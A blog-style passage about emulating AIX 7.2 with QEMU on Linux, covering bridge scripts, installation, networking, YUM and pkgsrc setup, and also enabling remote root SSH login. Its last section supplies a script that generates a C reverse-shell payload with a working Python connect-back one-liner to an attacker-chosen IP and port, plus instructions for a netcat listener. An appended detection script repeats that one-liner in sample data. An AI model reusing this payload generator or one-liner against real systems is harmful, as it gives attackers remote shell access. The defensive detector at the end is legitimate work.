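    run sysctl -w net.ipv4.ip_forward=1
    # forward only the guest network, only towards the uplink, plus replies
    ipt_add filter FORWARD -i "$BR" -s "$GUEST_NET" -o "$WAN_IF" -j ACCEPT
    ipt_add filter FORWARD -i "$WAN_IF" -o "$BR" -m conntrack --ctstate ESTABLISHED,RELATED -j ACCEPT
    ipt_add nat POSTROUTING -s "$GUEST_NET" -o "$WAN_IF" -j MASQUERADE
}

bridge_down() {
    ipt_del nat POSTROUTING -s "$GUEST_NET" -o "$WAN_IF" -j MASQUERADE
    ipt_del filter FORWARD -i "$WAN_IF" -o "$BR" -m conntrack --ctstate ESTABLISHED,RELATED -j ACCEPT
    ipt_del filter FORWARD -i "$BR" -s "$GUEST_NET" -o "$WAN_IF" -j ACCEPT
    # errors are ignored here: the device may already be gone
    run ip link del "$TAP" 2>/dev/null || :
    run ip link set "$LAN_IF" nomaster 2>/dev/null || :
    run ip link del "$BR" 2>/dev/null || :
}

case "${1:-}" in
    up)   bridge_up ;;
    down) bridge_down ;;
esac
```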

Here is a slightly modified /etc/qemu-ifup:

#! /bin/sh
# Script to bring a network (tap) device for qemu up.
# The idea is to add the tap device to the same bridge
# as we have default routing to.

# in order to be able to find brctl
PATH=$PATH:/sbin:/usr/sbin
ip=$(which ip)

if [ -n "$ip" ]; then
    ip link set "$1" up
else
    brctl=$(which brctl)
    if [ ! "$ip" -o ! "$brctl" ]; then
        echo "W: $0: not doing any bridge processing: neither ip nor brctl utility not found" >&2
        exit 0
    fi
    ifconfig "$1" 0.0.0.0 up
fi

switch=$(ip route ls |
    awk '/^default / {
        for(i=0;i<NF;i++) { if ($i == "dev") { print $(i+1); next; } }
    }'
)

# the modification: always use br0 instead of the default-route interface
switch=br0

# only add the interface to default-route bridge if we
# have such interface (with default route) and if that
# interface is actually a bridge.
# It is possible to have several default routes too
for br in $switch; do
    if [ -d /sys/class/net/$br/bridge/. ]; then
        if [ -n "$ip" ]; then
            ip link set "$1" master "$br"
        else
            brctl addif $br "$1"
        fi
        exit # exit with status of the previous command
    fi
done

echo "W: $0: no bridge for guest interface found" >&2

Next is my AIX 7.2 TL3SP1 installation loader script:

qemu-system-ppc64 -cpu POWER8 -machine pseries -m 2048 -serial stdio -drive file=disk.img,if=none,id=drive-virtio-disk0 -device virtio-scsi-pci,id=scsi -device scsi-hd,drive=drive-virtio-disk0 -cdrom aix.iso -prom-env "boot-command=dev / 0 0 s\" ibm,aix-diagnostics\" property boot cdrom:\ppc\chrp\bootfile.exe -s verbose" -net nic -net tap -display vnc=:1

And here is the loader script for the installed system:

qemu-system-ppc64 -cpu POWER8 -machine pseries -m 2048 -serial stdio -drive file=disk.img,if=none,id=drive-virtio-disk0 -device virtio-scsi-pci,id=scsi -device scsi-hd,drive=drive-virtio-disk0 -cdrom aix.iso -prom-env boot-command='boot disk: ' -net nic -net tap -display vnc=:1

My disk.img is a standard compressed qcow2 image (100 G).

Once the system is installed (please use this reference: https://www.ibm.com/developerworks/community/blogs/cgaix/resource/AIX_QEMU_blog.pdf?lang=en_us), be patient while it all loads (it takes approx 5 minutes on my Panasonic CF-53 ToughBook with an Intel(R) Core(TM) i5-3320M CPU @ 2.60GHz).

The following are the additional steps I took after logging in for the first time after the install (the /etc/motd is my own custom one).

AIX 7.2 networking

# ifconfig en0 10.0.2.10 up
# route add 0 10.0.2.2 
# chdev -l inet0 -a hostname=asterix

Then add a name server to /etc/resolv.conf:

# echo "nameserver 8.8.8.8" > /etc/resolv.conf 

To make it persistent I created a script, /etc/network.sh:

#!/bin/ksh
echo "nameserver 8.8.8.8" > /etc/resolv.conf
ifconfig en0 10.0.2.10 up
route add 0 10.0.2.2

And made it executable, of course:

# chmod +x /etc/network.sh

Then I added this as the last entry in /etc/inittab, so the network comes up on the next boot:

customnet:2:once:/etc/network.sh 2>&1

Test the above by rebooting the machine: issue the halt command and re-load it.

An important thing to notice here: do not use the -serial stdio interface in your terminal for normal work. CTRL-C will kill the qemu simulation, and that's something you don't want. So set up sshd instead (I have allowed remote root login for simplicity's sake here) and connect to your guest AIX via ssh from the Linux host!

Connect to the AIX guest (you can then open as many ssh sessions as needed; once the AIX guest is booted it's quite fast to use, taking into consideration that all POWER8 instructions are simulated by qemu).

Here are the details about the guest AIX:

AIX Version 7
Copyright IBM Corporation, 1982, 2018.
Console login: root
root's Password: 

Welcome to AIX 7.2 running via Qemu-system-ppc64 in X86_64 
-------------------------------------------------------------
Last unsuccessful login: Sat Nov 3 13:04:35 CET 2018 on /dev/vty0 from localhost
Last login: Sun Nov 4 20:12:27 CET 2018 on /dev/pts/1 from 10.0.2.2

[root@asterix ~]# prtconf 
System Model: IBM pSeries (emulated by qemu)
Machine Serial Number: Not Available
Processor Type: PowerPC_POWER8
Processor Implementation Mode: POWER 8
Processor Version: PV_8_Compat
Number Of Processors: 1
Processor Clock Speed: 1000 MHz
CPU Type: 64-bit
Kernel Type: 64-bit
LPAR Info: 0 aix_on_kvm
Memory Size: 2048 MB
Good Memory Size: 2048 MB
Platform Firmware level: Not Available
Firmware Version: SLOF,aik
Console Login: enable
Auto Restart: true
Full Core: false
NX Crypto Acceleration: Not Capable

Network Information
Host Name: asterix
IP Address: 
Sub Netmask: 
Gateway: 10.0.2.2
Name Server: 
Domain Name: 

Paging Space Information
Total Paging Space: 512MB
Percent Used: 1%

Volume Groups Information
============================================================================== 
Active VGs
============================================================================== 
rootvg:
PV_NAME PV STATE TOTAL PPs FREE PPs FREE DISTRIBUTION
hdisk0 active 799 649 159..122..48..160..160
============================================================================== 

INSTALLED RESOURCE LIST

The following resources are installed on the machine.
+/- = Added or deleted from Resource List.
* = Diagnostic support not available.

Model Architecture: chrp
Model Implementation: Uni-Processor, PCI bus

+ sys0 System Object
+ sysplanar0 System Planar
* vio0 Virtual I/O Bus
* vscsi0 Virtual SCSI Client Adapter
* cd0 Virtual SCSI Optical Served by VIO Server
* ent0 Virtual I/O Ethernet Adapter (l-lan)
* vsa0 LPAR Virtual Serial Adapter
* vty0 Asynchronous Terminal
* pci0 PCI Bus
* scsi0 qemu_virtio-scsi-pci:0000:00:02.0 Virtio SCSI Client Adapter (f41a0800)
* hdisk0 qemu_virtio-scsi-pci:0000:00:02.0-LW_0 MPIO Other Virtio SCSI Disk Drive
+ L2cache0 L2 Cache
+ mem0 Memory
+ proc0 Processor

Configure YUM

Please read the documentation here about how to set up the environment:
https://public.dhe.ibm.com/aix/freeSoftware/aixtoolbox/ezinstall/ppc/README-yum

Since we have no tools installed yet, I will use my Linux host machine to download all the needed RPMs and then copy them to the AIX guest via scp:

// On the Linux Host machine 
$ mkdir AIX 
$ cd AIX 
$ wget https://public.dhe.ibm.com/aix/freeSoftware/aixtoolbox/ezinstall/ppc/yum_bundle.tar

// On the AIX guest 
# mkdir /tmp/RPM
# cd /tmp/RPM
# scp user@10.0.2.2:/home/user/AIX/yum_bundle.tar . 
# tar -xvf yum_bundle.tar

Install the RPMs on the AIX guest:

# cd /tmp/RPM
# rpm -ivh ca-certificates-2016.10.7-2.aix6.1.ppc.rpm
# rpm -ivh curl-7.52.1-1.aix6.1.ppc.rpm
# rpm -ivh db-4.8.24-3.aix6.1.ppc.rpm
# rpm -ivh gdbm-1.8.3-5.aix5.2.ppc.rpm
# rpm -ivh gettext-0.19.7-1.aix6.1.ppc.rpm
# rpm -ivh glib2-2.14.6-2.aix5.2.ppc.rpm
# rpm -ivh readline-6.1-2.aix6.1.ppc.rpm
# rpm -ivh sqlite-3.15.2-1.aix6.1.ppc.rpm
# rpm -ivh python-2.7.10-1.aix6.1.ppc.rpm
# rpm -ivh python-devel-2.7.10-1.aix6.1.ppc.rpm
# rpm -ivh python-iniparse-0.4-1.aix6.1.noarch.rpm
# rpm -ivh python-pycurl-7.19.3-1.aix6.1.ppc.rpm
# rpm -ivh python-tools-2.7.10-1.aix6.1.ppc.rpm
# rpm -ivh python-urlgrabber-3.10.1-1.aix6.1.noarch.rpm
# rpm -ivh pysqlite-1.1.7-2.aix6.1.ppc.rpm
# rpm -ivh yum-metadata-parser-1.1.4-2.aix6.1.ppc.rpm
# rpm -ivh yum-3.4.3-5.aix6.1.noarch.rpm

Now YUM is ready to install some tools:

# yum install tcsh 
# yum install gcc

If there are problems with the RPM db afterwards, simply rebuild it:

# rpm --rebuilddb

I do not really know how to work in the Korn shell (the default), so I installed tcsh:

# yum install tcsh

And set the environment up to use it; this is the /etc/passwd entry for root:

root:!:0:0::/home/root:/usr/bin/tcsh

And then configure the tcsh prompt for the root user:

# cd /home/root 
# cat .cshrc 
set prompt = '[%n@%m %c]# '

PKGSRC Q3-2018 test

Next I tested a pkgsrc build; please make sure you read the following: https://wiki.netbsd.org/pkgsrc/how_to_use_pkgsrc_on_aix/

# ftp ftp.netbsd.org 
230 Guest login ok, access restrictions apply.
ftp> pas
Passive mode on.
ftp> bin
200 Type set to I.
ftp> cd /pub/pkgsrc/pkgsrc-2018Q3
ftp> get pkgsrc.tar.gz

# mv pkgsrc.tar.gz /tmp
# cd /tmp
# gunzip pkgsrc.tar.gz 
# tar -xvf pkgsrc.tar
# setenv CC /opt/freeware/bin/gcc 
# cd pkgsrc/bootstrap
# ./bootstrap

After the bootstrap, make sure the following variables are declared in tcsh:

# setenv CC /opt/freeware/bin/gcc
# setenv USE_NATIVE_GCC yes

Then we can build pkgsrc packages as follows:

# /usr/pkg/bin/bmake install clean

P.S.

What does not work:

  •  Bash (bash_64 cpu 95%)
  •  Wget – core dump
  •  Ruby (cpu 95%)
  •  ps (core dump) – using topas instead
  •  vmstat – using topas instead

Video presentation is located here

Reverse shell on AIX 7.2

The current msfvenom (Metasploit) payloads for AIX are aged and no longer work on AIX systems. Here is what is available right now:

# ./msfvenom -l payload | grep aix
aix/ppc/shell_bind_tcp                   Listen for a connection and spawn a command shell
aix/ppc/shell_find_port                  Spawn a shell on an established connection
aix/ppc/shell_interact                   Simply execve /bin/sh (for inetd programs)
aix/ppc/shell_reverse_tcp                Connect back to attacker and spawn a command shell

None of the above payloads is usable on modern AIX 7.2 systems. One can elaborate on the following article from 2012: https://www.offensive-security.com/vulndev/aix-shellcode-metasploit/

But in our exercise we will use something much simpler. Since AIX 7.2 with YUM enabled ships with Python, we can create a nice piece of C code that can be compiled on AIX with GCC 8.1.0 and executed there to give us the desired reverse shell.

The following code generator is written to work on a Linux system and is pretty straightforward. Please note that it contains the bogus shellcode inside, which of course does not work; I left it there simply because I reused a C constructor file from another project and was lazy.

clear 
echo "************************************************************"
echo " Automatic shellcode generator - FOR METASPLOIT             "
echo "   For AIX ppc64   testing on AIX 7.2 TL3SP1                " 
echo " Includes non working ppc reverse shell shellcode soup      "
echo " i    And a working python reverse shell                    "
echo "************************************************************"
echo -e "What IP are we gonna use ? \c"
read IP 
echo -e "What Port Number are we gonna listen to? : \c"
read port
echo '[*] Cleaning up ' 
rm -f aix-payload.c

cat <<EOF > aix-payload.c 
#include <stdio.h>
#include <sys/types.h>
#include <sys/ipc.h>
#include <sys/msg.h>
#include <string.h>
#include <sys/mman.h>
#include <fcntl.h>
#include <sys/socket.h>
#include <stdlib.h>
#include <errno.h>
#include <sys/mman.h>
#include <sys/types.h>
#include <sys/stat.h>
#include <sys/ioctl.h>
#include <unistd.h>
#include <strings.h>
#include <unistd.h>
#include <poll.h>
#include <pthread.h>
#include <stdint.h>

unsigned char buf[] = 
"\x7c\xa5\x2a\x79\x40\x82\xff\xfd\x7f\xc8\x02\xa6\x3b\xde\x01"
"\xff\x3b\xde\xfe\x25\x7f\xc9\x03\xa6\x4e\x80\x04\x20\xff\x02"
"\x01\xbb\xc0\xa8\x0b\x04\x4c\xc6\x33\x42\x44\xff\xff\x02\x3b"
"\xde\xff\xf8\x3b\xa0\x07\xff\x38\x9d\xf8\x02\x38\x7d\xf8\x03"
"\x38\x5d\xf8\xf4\x7f\xc9\x03\xa6\x4e\x80\x04\x21\x7c\x7c\x1b"
"\x78\x38\xbd\xf8\x11\x38\x9e\xff\xf8\x38\x5d\xf8\xf5\x7f\xc9"
"\x03\xa6\x4e\x80\x04\x21\x3b\x7d\xf8\x03\x7f\x63\xdb\x78\x38"
"\x5d\xf9\x17\x7f\xc9\x03\xa6\x4e\x80\x04\x21\x7f\x65\xdb\x78"
"\x7c\x84\x22\x78\x7f\x83\xe3\x78\x38\x5d\xfa\x93\x7f\xc9\x03"
"\xa6\x4e\x80\x04\x21\x37\x7b\xff\xff\x40\x80\xff\xd4\x7c\xa5"
"\x2a\x79\x40\x82\xff\xfd\x7f\x08\x02\xa6\x3b\x18\x01\xff\x38"
"\x78\xfe\x29\x98\xb8\xfe\x31\x94\xa1\xff\xfc\x94\x61\xff\xfc"
"\x7c\x24\x0b\x78\x38\x5d\xf8\x08\x7f\xc9\x03\xa6\x4e\x80\x04"
"\x21\x2f\x62\x69\x6e\x2f\x63\x73\x68";

void genlol();
int random_in_range (unsigned int min, unsigned int max);
int random_in_range (unsigned int min, unsigned int max)
{
int base_random = rand();
if (RAND_MAX == base_random){
return random_in_range(min, max);
}
int range = max - min,
remainder = RAND_MAX % range,
bucket = RAND_MAX / range;
if (base_random < RAND_MAX - remainder) {
return min + base_random/bucket;
} else {
return random_in_range (min, max);
}
}
char* rev(char* str)
{
int end=strlen(str)-1;
int i;
for(i=5; i<end; i++)
{
str[i] ^= 1;
}
return str;
}
int main(int argc, char **argv)
{
system ("/usr/bin/clear");
printf ("==================\n");
printf ("AIX reverse shell \n");
printf ("==================\n");
system("/usr/bin/sleep 1");
printf ("Getting psyched ..\n");
printf(".");
fflush(stdout);
system("/usr/bin/sleep 1");
printf("..");
fflush(stdout);
system("/usr/bin/sleep 1");
printf("...");
fflush(stdout);
system("/usr/bin/sleep 1");
printf("....");
printf ("\n[*] Spawning shell\n");
pid_t process_id = 0;
pid_t sid = 0;
process_id = fork();
if (process_id < 0)
{
printf("hold on!\n");
exit(1);
}
if (process_id > 0)
{
printf("[+] Check the remote host now \n", process_id);
exit(0);
}
void *ptr = mmap(0, 0x2000, PROT_WRITE|PROT_READ|PROT_EXEC, MAP_ANON | MAP_PRIVATE, -1, 0);
memcpy(ptr,buf,sizeof buf);
void (*fp)() = (void (*)())ptr;
system("/usr/bin/python -c \'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((\"CHANGEIP\",CHANGEPORT));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call([\"/usr/bin/sh\",\"-i\"]);\'");
fp();
printf ("\n[*]  ping..pong\n");
}
void genlol(){
int num1, num2, num3;
num1=100;
while (num1<=5) {
num1=random_in_range(0,10000);
num2=random_in_range(0,10000);
num3=random_in_range(0,10000);
printf ("\n[*] ..... \n");
}
}
EOF
sed -i "s/CHANGEIP/$IP/g" aix-payload.c
sed -i "s/CHANGEPORT/$port/g" aix-payload.c

if [ -f ./aix-payload.c ]; then
echo '[*] aix-payload.c generated ...'
ls -la aix-payload.c
echo '[*] Now upload the aix-payload.c to AIX machine and compile with gcc aix-payload.c -o aix-payload' 
echo '[*] And on the attacker machine start netcat listener on TCP port we have chosen above'
else
echo '[-] Something went wrong .. '
exit 0
fi

Once we run the above script, we need to transfer the source code it generates (aix-payload.c) to the AIX 7.2 system and compile it there.

On our attacker machine you need to have Netcat installed; we just call it and listen for an incoming TCP connection on the port we defined in the generator.

Next we execute the compiled aix-payload binary on the target AIX 7.2 machine.

And watch the reverse shell pop up on our netcat listener.

And that is it. A simple exercise (and please excuse my C code).
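From the defender's side, the process the generated payload leaves behind is easy to spot in a process listing: an interpreter started with -c whose inline code opens a socket and dup2()s it over the standard descriptors, with an interactive shell as its child. The following check is an added example, not part of the post; it assumes a listing with the columns USER PID PPID ARGS (as from "ps -eo user,pid,ppid,args" on a host where ps works; the post notes ps itself core dumps on the emulated AIX) and uses a constructed sample with the documentation address 192.0.2.10.

```shell
#!/bin/sh
# Added example, not from the post: flag interpreter connect-back one-liners
# and the interactive shells they spawn, given a "user pid ppid args" listing.

# Read a listing on stdin, print suspicious entries, exit 0 if any were found.
detect_reverse_shells() {
    awk -v interp='^([^ ]*[/])?(python|perl|ruby)[0-9.]* -c ' \
        -v shell='(^|[/])(sh|bash|ksh|csh|tcsh) -i' '
    {
        # rebuild the command line from column 4 onwards
        pid[NR] = $2; ppid[NR] = $3; line[NR] = $0; cmd[NR] = $4
        for (i = 5; i <= NF; i++) cmd[NR] = cmd[NR] " " $i
    }
    END {
        # pass 1: inline interpreter code that wires a socket onto the std fds
        for (n = 1; n <= NR; n++)
            if (cmd[n] ~ interp && cmd[n] ~ /socket/ && cmd[n] ~ /dup2/) {
                bad[pid[n]] = 1
                print "interpreter-connectback", line[n]
                found = 1
            }
        # pass 2: interactive shells whose parent is one of those interpreters
        for (n = 1; n <= NR; n++)
            if ((ppid[n] in bad) && cmd[n] ~ shell) {
                print "shell-child", line[n]
                found = 1
            }
        exit found ? 0 : 1
    }'
}

# Constructed sample listing (not captured from a real host). PID 412 is what
# the generated payload looks like from the outside, 413 the shell it spawned;
# the other entries are benign noise (an interactive ksh under sshd included).
sample_listing() {
    cat <<'EOF'
root     1     0 /etc/init
root   204     1 /usr/sbin/sshd
root   310   204 /usr/bin/python -c import os,sys; print(sys.version)
user   412     1 /usr/bin/python -c import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("192.0.2.10",4444));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/usr/bin/sh","-i"]);
user   413   412 /usr/bin/sh -i
root   520   204 /usr/bin/ksh -i
EOF
}

# "sh detect.sh demo" runs the check against the constructed sample.
if [ "${1:-}" = demo ]; then
    sample_listing | detect_reverse_shells
fi
```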